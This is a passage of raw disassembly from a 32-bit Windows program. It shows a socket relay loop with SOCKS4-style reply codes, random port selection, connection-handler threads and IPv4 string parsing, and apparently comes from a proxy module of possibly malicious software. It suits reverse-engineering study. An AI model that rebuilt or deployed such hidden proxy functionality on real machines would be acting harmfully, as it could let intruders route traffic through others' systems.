mov byte ptr [ebp-5CFh], 5Bh
push 8
lea eax, [ebp-5D0h]
push eax
push dword ptr [ebp-5D4h]
call sub_4053BF
add esp, 0Ch
push dword ptr [ebp-5D4h]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407537: ; CODE XREF: .text:00407504�j
mov byte ptr [ebp-5CFh], 5Ah
push 8
lea eax, [ebp-5D0h]
push eax
push dword ptr [ebp-5D4h]
call sub_4053BF
add esp, 0Ch
loc_407555: ; CODE XREF: .text:0040762A�j
push dword ptr [ebp-5D4h]
call sub_40447B
pop ecx
test eax, eax
jz short loc_4075BD
push 0
push 1000h
lea eax, [ebp-16E0h]
push eax
push dword ptr [ebp-5D4h]
call ds:dword_417248 ; recv
mov [ebp-16E4h], eax
cmp dword ptr [ebp-16E4h], 0
jz short loc_407597
cmp dword ptr [ebp-16E4h], 0FFFFFFFFh
jnz short loc_40759C
loc_407597: ; CODE XREF: .text:0040758C�j
jmp loc_40762F
; ---------------------------------------------------------------------------
loc_40759C: ; CODE XREF: .text:00407595�j
push dword ptr [ebp-16E4h]
lea eax, [ebp-16E0h]
push eax
push dword ptr [ebp-5E0h]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4075BD
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_4075BD: ; CODE XREF: .text:00407563�j
; .text:004075B9�j
push dword ptr [ebp-5E0h]
call sub_40447B
pop ecx
test eax, eax
jz short loc_407622
push 0
push 1000h
lea eax, [ebp-16E0h]
push eax
push dword ptr [ebp-5E0h]
call ds:dword_417248 ; recv
mov [ebp-16E8h], eax
cmp dword ptr [ebp-16E8h], 0
jz short loc_4075FF
cmp dword ptr [ebp-16E8h], 0FFFFFFFFh
jnz short loc_407601
loc_4075FF: ; CODE XREF: .text:004075F4�j
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407601: ; CODE XREF: .text:004075FD�j
push dword ptr [ebp-16E8h]
lea eax, [ebp-16E0h]
push eax
push dword ptr [ebp-5D4h]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_407622
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407622: ; CODE XREF: .text:004075CB�j
; .text:0040761E�j
push 32h
call ds:dword_41709C ; Sleep
jmp loc_407555
; ---------------------------------------------------------------------------
loc_40762F: ; CODE XREF: .text:loc_407597�j
; .text:004075BB�j ...
push dword ptr [ebp-5D4h]
call sub_40538D
pop ecx
push dword ptr [ebp-5E0h]
call sub_40538D
pop ecx
xor eax, eax
locret_407649: ; CODE XREF: .text:00407391�j
; .text:0040749B�j ...
leave
retn 4
; ---------------------------------------------------------------------------
loc_40764D: ; DATA XREF: sub_4077DD+B4�o
push ebp
mov ebp, esp
sub esp, 1CCh
push 1BDh
push dword ptr [ebp+8]
lea eax, [ebp-1C0h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp-1BCh]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp-1C4h], eax
cmp dword ptr [ebp-1C4h], 0
jnz short loc_4076A8
push dword ptr [ebp-1C0h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4077D9
; ---------------------------------------------------------------------------
loc_4076A8: ; CODE XREF: .text:00407693�j
lea eax, [ebp-1BCh]
push eax
mov eax, [ebp-1C0h]
push dword ptr [eax]
push offset dword_418EF8
lea eax, [ebp-1A6h]
push eax
call sub_40D53F
add esp, 10h
loc_4076CB: ; CODE XREF: .text:00407706�j
; .text:0040772E�j ...
push 3E8h
push dword ptr [ebp-1C4h]
call sub_4048EF
pop ecx
pop ecx
mov [ebp-1C8h], eax
mov eax, [ebp-1C0h]
cmp dword ptr [eax+4], 0
jnz short loc_4076F8
cmp dword ptr [ebp-1C8h], 0
jnz short loc_4076FD
loc_4076F8: ; CODE XREF: .text:004076ED�j
jmp loc_4077BF
; ---------------------------------------------------------------------------
loc_4076FD: ; CODE XREF: .text:004076F6�j
cmp dword ptr [ebp-1C8h], 0FFFFFFFFh
jnz short loc_407708
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407708: ; CODE XREF: .text:00407704�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp-1CCh], eax
cmp dword ptr [ebp-1CCh], 0
jnz short loc_407730
push dword ptr [ebp-1C8h]
call sub_4053B1
pop ecx
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407730: ; CODE XREF: .text:00407720�j
mov eax, [ebp-1CCh]
mov ecx, [ebp-1C8h]
mov [eax], ecx
lea eax, [ebp-1BCh]
push eax
mov eax, [ebp-1CCh]
add eax, 4
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp-1B6h]
push eax
mov eax, [ebp-1CCh]
add eax, 0Ah
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push 1A3h
lea eax, [ebp-1A6h]
push eax
mov eax, [ebp-1CCh]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp-1CCh]
push offset loc_40732D
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4077BA
push dword ptr [ebp-1CCh]
call sub_416B4C ; free
pop ecx
push dword ptr [ebp-1C8h]
call sub_4053B1
pop ecx
loc_4077BA: ; CODE XREF: .text:004077A0�j
jmp loc_4076CB
; ---------------------------------------------------------------------------
loc_4077BF: ; CODE XREF: .text:loc_4076F8�j
push dword ptr [ebp-1C4h]
call sub_404CBB
pop ecx
push dword ptr [ebp-1C0h]
call sub_409763
pop ecx
xor eax, eax
locret_4077D9: ; CODE XREF: .text:004076A3�j
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4077DD proc near ; CODE XREF: sub_40A9CF+17A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_40780F
push 0Ah
lea eax, [ebp+var_8]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+arg_4], eax
loc_40780F: ; CODE XREF: sub_4077DD+A�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_407825
jmp short locret_40789E
; ---------------------------------------------------------------------------
loc_407825: ; CODE XREF: sub_4077DD+44�j
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_407844
mov eax, [ebp+arg_8]
mov [ebp+var_10], eax
jmp short loc_40784B
; ---------------------------------------------------------------------------
loc_407844: ; CODE XREF: sub_4077DD+5D�j
mov [ebp+var_10], offset byte_41DE30
loc_40784B: ; CODE XREF: sub_4077DD+65�j
push 10h
push [ebp+var_10]
mov eax, [ebp+var_C]
add eax, 0Ah
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push offset dword_418F2C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_C]
push offset loc_40764D
call sub_4095A4
add esp, 14h
locret_40789E: ; CODE XREF: sub_4077DD+46�j
leave
retn
sub_4077DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078A0 proc near ; CODE XREF: sub_40A9CF+216�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4078B8
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078B8: ; CODE XREF: sub_4078A0+14�j
; sub_4078A0:loc_4078E2�j
cmp [ebp+var_4], 0
jnz short loc_4078C0
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078C0: ; CODE XREF: sub_4078A0+1C�j
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_4078E0
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
jmp short loc_4078E2
; ---------------------------------------------------------------------------
loc_4078E0: ; CODE XREF: sub_4078A0+33�j
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078E2: ; CODE XREF: sub_4078A0+3E�j
jmp short loc_4078B8
; ---------------------------------------------------------------------------
locret_4078E4: ; CODE XREF: sub_4078A0+16�j
; sub_4078A0+1E�j ...
leave
retn
sub_4078A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078E6 proc near ; CODE XREF: sub_407D42+A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_4078FC
; ---------------------------------------------------------------------------
loc_4078F5: ; CODE XREF: sub_4078E6:loc_407921�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4078FC: ; CODE XREF: sub_4078E6+D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407923
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_407921
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407921: ; CODE XREF: sub_4078E6+32�j
jmp short loc_4078F5
; ---------------------------------------------------------------------------
loc_407923: ; CODE XREF: sub_4078E6+21�j
mov eax, [ebp+var_8]
leave
retn
sub_4078E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407928 proc near ; CODE XREF: sub_40E618+2B�p
; sub_40E618+185�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_10], 0
jnz short loc_407963
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_8]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_C]
call sub_416B6A ; memset
add esp, 0Ch
xor eax, eax
jmp locret_407A54
; ---------------------------------------------------------------------------
loc_407963: ; CODE XREF: sub_407928+A�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+arg_0]
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov [eax], ecx
mov [ebp+var_8], 1
jmp short loc_4079A1
; ---------------------------------------------------------------------------
loc_40799A: ; CODE XREF: sub_407928:loc_407A4C�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4079A1: ; CODE XREF: sub_407928+70�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_10]
jge loc_407A51
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4-4], 0
jz short loc_407A0A
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_8]
mov [edx+ecx*4], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4], 0
jz short loc_4079F8
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
mov eax, [ecx+eax*4]
sub eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
add ecx, eax
mov [ebp+var_C], ecx
jmp short loc_4079FC
; ---------------------------------------------------------------------------
loc_4079F8: ; CODE XREF: sub_407928+B8�j
and [ebp+var_C], 0
loc_4079FC: ; CODE XREF: sub_407928+CE�j
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_C]
mov [ecx+eax*4], edx
jmp short loc_407A4C
; ---------------------------------------------------------------------------
loc_407A0A: ; CODE XREF: sub_407928+90�j
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_8]
dec eax
jmp short locret_407A54
; ---------------------------------------------------------------------------
loc_407A4C: ; CODE XREF: sub_407928+E0�j
jmp loc_40799A
; ---------------------------------------------------------------------------
loc_407A51: ; CODE XREF: sub_407928+7F�j
mov eax, [ebp+arg_10]
locret_407A54: ; CODE XREF: sub_407928+36�j
; sub_407928+122�j
leave
retn
sub_407928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A56 proc near ; CODE XREF: sub_401146+6B�p
; sub_401146+CA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_407A81
cmp ecx, 1
jz short loc_407A7E
loc_407A6E: ; CODE XREF: sub_407A56+26�j
mov al, [esi]
mov [edi], al
test al, al
jz short loc_407A81
inc esi
inc edi
dec ecx
cmp ecx, 1
jnz short loc_407A6E
loc_407A7E: ; CODE XREF: sub_407A56+16�j
mov byte ptr [edi], 0
loc_407A81: ; CODE XREF: sub_407A56+11�j
; sub_407A56+1E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_407A56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A86 proc near ; CODE XREF: sub_4097A7+17�p
; sub_4098F3+17�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407A97
; ---------------------------------------------------------------------------
loc_407A90: ; CODE XREF: sub_407A86+3A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407A97: ; CODE XREF: sub_407A86+8�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407AC6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_407AC2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 39h
jg short loc_407AC2
jmp short loc_407A90
; ---------------------------------------------------------------------------
loc_407AC2: ; CODE XREF: sub_407A86+2A�j
; sub_407A86+38�j
xor al, al
jmp short locret_407AC8
; ---------------------------------------------------------------------------
loc_407AC6: ; CODE XREF: sub_407A86+1C�j
mov al, 1
locret_407AC8: ; CODE XREF: sub_407A86+3E�j
leave
retn
sub_407A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407ACA proc near ; CODE XREF: sub_401000+F6�p
; sub_4148CE+61�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_8]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
and [ebp+var_8], 0
and [ebp+var_C], 0
jmp short loc_407AED
; ---------------------------------------------------------------------------
loc_407AE6: ; CODE XREF: sub_407ACA:loc_407B58�j
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_407AED: ; CODE XREF: sub_407ACA+1A�j
mov eax, [ebp+arg_4]
sub eax, [ebp+var_4]
cmp [ebp+var_C], eax
jg short loc_407B5A
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
sub ecx, 20h
cmp eax, ecx
jnz short loc_407B58
loc_407B37: ; CODE XREF: sub_407ACA+3F�j
; sub_407ACA+55�j
push [ebp+var_4]
push [ebp+arg_8]
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_407B58
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
jmp short locret_407B5C
; ---------------------------------------------------------------------------
loc_407B58: ; CODE XREF: sub_407ACA+6B�j
; sub_407ACA+84�j
jmp short loc_407AE6
; ---------------------------------------------------------------------------
loc_407B5A: ; CODE XREF: sub_407ACA+2C�j
xor eax, eax
locret_407B5C: ; CODE XREF: sub_407ACA+8C�j
leave
retn
sub_407ACA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407B5E proc near ; CODE XREF: sub_40A2D2+11D�p
; sub_40E943+20�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_407B70
; ---------------------------------------------------------------------------
loc_407B69: ; CODE XREF: sub_407B5E:loc_407BEE�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407B70: ; CODE XREF: sub_407B5E+9�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407B85
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407B85: ; CODE XREF: sub_407B5E+1D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_407BA1
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_407BEE
loc_407BA1: ; CODE XREF: sub_407B5E+33�j
and [ebp+var_8], 0
jmp short loc_407BAE
; ---------------------------------------------------------------------------
loc_407BA7: ; CODE XREF: sub_407B5E:loc_407BEC�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407BAE: ; CODE XREF: sub_407B5E+47�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Dh
jz short loc_407BD2
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Ah
jnz short loc_407BE1
loc_407BD2: ; CODE XREF: sub_407B5E+60�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
and byte ptr [ecx+eax], 0
jmp short loc_407BEC
; ---------------------------------------------------------------------------
loc_407BE1: ; CODE XREF: sub_407B5E+72�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
add eax, [ebp+var_8]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407BEC: ; CODE XREF: sub_407B5E+81�j
jmp short loc_407BA7
; ---------------------------------------------------------------------------
loc_407BEE: ; CODE XREF: sub_407B5E+41�j
jmp loc_407B69
; ---------------------------------------------------------------------------
locret_407BF3: ; CODE XREF: sub_407B5E+25�j
; sub_407B5E+8C�j
leave
retn
sub_407B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BF5 proc near ; CODE XREF: sub_411A09+5D�p
; sub_411A09+F3�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_407BF8: ; CODE XREF: sub_407BF5:loc_407C28�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_0]
inc ecx
mov [ebp+arg_0], ecx
test eax, eax
jz short loc_407C2A
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407C15
jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C15: ; CODE XREF: sub_407BF5+1C�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C28
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
jmp short loc_407C2A
; ---------------------------------------------------------------------------
loc_407C28: ; CODE XREF: sub_407BF5+29�j
jmp short loc_407BF8
; ---------------------------------------------------------------------------
loc_407C2A: ; CODE XREF: sub_407BF5+12�j
; sub_407BF5+1E�j ...
pop ebp
retn
sub_407BF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C2C proc near ; CODE XREF: .text:0040869F�p
; sub_40CA29+91�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_407C49
; ---------------------------------------------------------------------------
loc_407C42: ; CODE XREF: sub_407C2C+31�j
; sub_407C2C:loc_407CCD�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407C49: ; CODE XREF: sub_407C2C+14�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C68
cmp [ebp+var_C], 0
jz short loc_407C5F
jmp short loc_407C42
; ---------------------------------------------------------------------------
loc_407C5F: ; CODE XREF: sub_407C2C+2F�j
mov [ebp+var_C], 1
jmp short loc_407C6C
; ---------------------------------------------------------------------------
loc_407C68: ; CODE XREF: sub_407C2C+29�j
and [ebp+var_C], 0
loc_407C6C: ; CODE XREF: sub_407C2C+3A�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407CCD
cmp [ebp+arg_8], 0
jz short loc_407CCB
cmp [ebp+var_8], 0
jz short loc_407CCB
loc_407C9C: ; CODE XREF: sub_407C2C:loc_407CC9�j
push 1
pop eax
test eax, eax
jz short loc_407CCB
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
and byte ptr [eax], 0
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407CC7
cmp [ebp+var_8], 0
jnz short loc_407CC9
loc_407CC7: ; CODE XREF: sub_407C2C+93�j
jmp short loc_407CCB
; ---------------------------------------------------------------------------
loc_407CC9: ; CODE XREF: sub_407C2C+99�j
jmp short loc_407C9C
; ---------------------------------------------------------------------------
loc_407CCB: ; CODE XREF: sub_407C2C+68�j
; sub_407C2C+6E�j ...
jmp short locret_407CD2
; ---------------------------------------------------------------------------
loc_407CCD: ; CODE XREF: sub_407C2C+62�j
jmp loc_407C42
; ---------------------------------------------------------------------------
locret_407CD2: ; CODE XREF: sub_407C2C:loc_407CCB�j
leave
retn
sub_407C2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407CD4 proc near ; CODE XREF: sub_407D42+5F�p
; sub_407D42+79�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407CE5
; ---------------------------------------------------------------------------
loc_407CDE: ; CODE XREF: sub_407CD4+68�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407CE5: ; CODE XREF: sub_407CD4+8�j
cmp [ebp+var_4], 4
jge short loc_407D3E
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 2Eh
jnz short loc_407D0E
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D0E: ; CODE XREF: sub_407CD4+23�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407D2C
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D2C: ; CODE XREF: sub_407CD4+45�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
jmp short loc_407CDE
; ---------------------------------------------------------------------------
loc_407D3E: ; CODE XREF: sub_407CD4+15�j
xor eax, eax
locret_407D40: ; CODE XREF: sub_407CD4+38�j
; sub_407CD4+56�j
leave
retn
sub_407CD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D42 proc near ; CODE XREF: sub_407F3D+19�p
; sub_407F3D+3F�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
push 2Eh
push [ebp+arg_0]
call sub_4078E6
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 3
jle short loc_407D63
xor eax, eax
jmp locret_407E0A
; ---------------------------------------------------------------------------
loc_407D63: ; CODE XREF: sub_407D42+18�j
mov eax, [ebp+arg_10]
and byte ptr [eax], 0
mov eax, [ebp+arg_C]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_407DE9
cmp [ebp+var_8], 1
jz short loc_407DCF
cmp [ebp+var_8], 2
jz short loc_407DB5
cmp [ebp+var_8], 3
jz short loc_407D9B
jmp short loc_407E08
; ---------------------------------------------------------------------------
loc_407D9B: ; CODE XREF: sub_407D42+55�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DB5
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DB5: ; CODE XREF: sub_407D42+4F�j
; sub_407D42+6D�j
push [ebp+arg_0]
push [ebp+arg_8]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DCF
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DCF: ; CODE XREF: sub_407D42+49�j
; sub_407D42+87�j
push [ebp+arg_0]
push [ebp+arg_C]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DE9
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DE9: ; CODE XREF: sub_407D42+43�j
; sub_407D42+A1�j
push [ebp+arg_0]
push [ebp+arg_10]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407E03
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E03: ; CODE XREF: sub_407D42+BB�j
push 1
pop eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E08: ; CODE XREF: sub_407D42+57�j
xor eax, eax
locret_407E0A: ; CODE XREF: sub_407D42+1C�j
; sub_407D42+71�j ...
leave
retn
sub_407D42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E0C proc near ; CODE XREF: sub_407F3D+A3�p
; sub_407F3D+C1�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
